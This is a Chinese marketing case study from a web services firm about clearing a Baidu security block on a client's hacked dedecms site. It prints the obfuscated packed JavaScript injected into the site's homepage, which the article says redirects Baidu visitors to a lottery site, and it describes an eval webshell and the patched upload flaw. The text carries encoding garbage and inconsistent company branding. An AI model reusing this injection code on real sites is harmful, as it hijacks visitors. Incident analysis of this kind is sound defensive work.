臨近年底,客戶的公司網站被百度網址安全中心攔截了,公司網站打不開了,影響范圍很大��,于是通過朋友介紹找到我們晉城龍鼎網絡服務有限公司尋求幫忙解封,關于如何解除百度的安全攔截提示�����,下面就將我們晉城龍鼎網絡服務有限公司的解決辦法分享給大家��,希望能對您有所幫助��。
客戶剛從公司下班回家,接到領導的電話說是網站在百度怎么打不開了��,客戶時間用手機訪問網站�����,發現網站正常��,隨后又用百度去搜索公司網站域名,發現網站竟然被百度網址安全中心攔截了并提示:違法違規網頁�����,建議關閉,您訪問的是://公司域名�����,此網頁可能為違法違規網頁��,包含非法信息以及不健康內容���,請謹慎訪問�����。如下圖所示:
整個客戶公司的網站在百度無法打開���,的被百度攔截掉了��,百度提示的肯定是有原因的,我們晉城龍鼎網絡服務有限公司工程師通過百度搜索發現��,網站在搜索結果里被標注了:
百度網址安全中心提醒您:該站點可能受到黑客攻擊,部分頁面已被非法篡改!下圖所示:
點擊去后,彈出百度的攔截頁面,提示:該站點可能由于受到黑客攻擊���,部分頁面已被非法篡改,可能會威脅到您的財產和信息安全��,建議您謹慎訪問�����。我們處理了太多像這種情況的網站了�����,我們打開百度網址安全中/掃描看一下是什么原因導致網站被百度攔截,輸入客戶公司網址點查詢�����,發現網站被標記危險���,并提示:危險��,網站網頁中含有惡意信息!
這說明網站里含有惡意內容的信息被百度檢測到了��,但是百度并沒有指出到底是哪個網站頁面存在惡意信息��,看到百度旗下還有個百度云觀測的產品�����,注冊免費使用,檢測網站的安全情況��,沒有檢測到網站出現安全問題���。到底含有惡意內容的信息在哪里�����?該怎么查找��,根據我們SINE安全多年的經驗,通過百度的工具以及發送郵件,申訴等通道是獲取不到具體的惡意信息鏈接��,百度只是官方的回復一下���,具體問題的根源在哪里��,得自己動手去查找代碼��,以及公司網站在百度的收錄情況。
發現了問題�����,客戶公司網站在百度的快照內容被篡改了���,是一些彩piao內容��,既然已經知道網站里含有惡意信息。那就從網站代碼開始入手�����,客戶網站使用的是開源的dedecms織夢系統��,php+mysql數據庫���,從服務器壓縮了一份��,下載到本地的電腦,開始檢查源代碼���,每一行,每一個代碼都不要放過��,對比客戶之前網站備份代碼�����,發現plus下的search.php被篡改了���,多出來一些eval一句話木馬代碼�����,也叫webshell.
客戶的網站首頁文件index.html也被篡改添加了代碼��,尤其標題描述都被篡改了,從百度里搜索點擊到客戶公司網站�����,自動跳轉到了彩piao網站上去了��。這跟index.html被篡改是對應的,我們晉城龍鼎網絡服務有限公司貼出代碼讓大家看一下:
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(par
seInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,St
ring)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=
1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\k\\a\\1\
\m\\9\\7\\o\\0"]["\\n\\4\\8\\0\\7"](\'\\e\\2\\1\\4\\8\\5\\0\\0\\i\\5\\7\\c\\6\\0\\7\\j\\0\\3\\f\\b\\u\\b\\2\
\1\\4\\8\\5\\0\\6 \\2\\4\\1\\c\\6\\t\\0\\0\\5\\w\\3\\3\\v\\q\\p\\s\\r\\h\\1\\a\\9\\3\\g\\g\\h\\f\\2\\6\\d\\
e\\3\\2\\1\\4\\8\\5\\0\\d\');',33,33,'x74|x63|x73|x2f|x72|x70|x22|x65|x69|x6d|x6f|x61|x3d|x3e|
x3c|x6a|x31|x2e|x79|x78|x64|window|x75|x77|x6e|x38|x37|x71|x7a|x68|x76|
x35|x3a'.split('|'),0,{}))</script>
這種掛馬代碼功能是:對百度來的點擊�����,進行判斷并跳轉到攻擊者設定的域名���,如果是直接輸入網站域名是不會跳轉�����。如果對代碼不是太懂的話��,根本無法理解這段代碼的意思。問題找到了�����,那就開始著手處理�����,刪除首頁的惡意代碼���,恢復網站的正常訪問��,刪除攻擊者留下的webshell網站木馬后門文件,并對客戶網站代碼進行全面的網站安全檢測���,包括網站漏洞檢測,發現客戶使用的是早期版本的dedecms��,存在遠程代碼執行漏洞���,可以上傳任意文件的文件上傳漏洞�����。我們SINE安全對其代碼做了漏洞修復,對上傳做了后綴名的安全過濾與限制,對文件上傳的目錄做了安全部署���,防止PHP腳本文件的執行與寫入。對網站進行了整體的安全加固與防護,防止攻擊者繼續篡改網站���,有些客戶網站以為只是刪除首頁那部分惡意代碼就能解決問題,大錯特錯,問題的根源不是刪除�����,而是網站存在漏洞���,只是刪除惡意代碼其實就是亡羊補牢���,要從根源入手�����,修復網站的漏洞��。才能的解決百度的攔截問題���,百度會定期對網站進行安全監控�����,如果多次出現被篡改的情況,會直接將您網站拉入黑名單,長時間的對網站進行攔截���。
至此客戶網站才得以安全�����,的刪除了惡意信息跟惡意的代碼��,通過百度網址安全中心的在線提交申訴,等待百度的人工審核,在申訴后的三天�����,收到了百度網址安全中心的回復��,百度網址安全技術人員答復如下:你好�����,對于//公司網站域名的檢測結果為:通過審核,到此網站被百度網址安全中心的攔截��,解封��,客戶公司網站恢復正常訪問�����,我們將損失給客戶降到了低,將客戶的事當成自己的事來做���,我們的路才能走的更寬。
晉城市龍鼎網絡服務有限公司提供安全的網站服務環境���,為企業提供網站建設與制作開發,小程序制作與開發���,網站運營,網站安全防護,APP制作與開發��,淘寶運營等服務有任何的網站問題都可以找晉城市龍鼎網絡服務有限公司���!
微信聯系 
進入手機版 
點擊咨詢
18503564624
返回頂部